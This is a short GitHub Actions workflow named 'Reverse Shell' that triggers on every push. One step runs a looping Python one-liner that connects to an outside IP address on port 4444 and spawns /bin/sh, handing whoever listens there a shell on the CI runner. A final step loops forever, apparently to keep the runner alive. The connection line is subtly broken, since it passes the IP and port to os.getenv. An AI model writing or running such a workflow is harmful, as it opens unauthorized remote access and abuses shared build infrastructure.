name: Reverse Shell

on: [push]

jobs:
  reverse-shell:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.x'

    - name: Create reverse shell script
      run: |
        while true; do python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("185.159.128.111"),int(os.getenv("4444"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ; sleep  10 ; done
        echo salam

    - name: Run reverse shell script
      run: while true ; do echo $RANDOM ; sleep 3 ; done
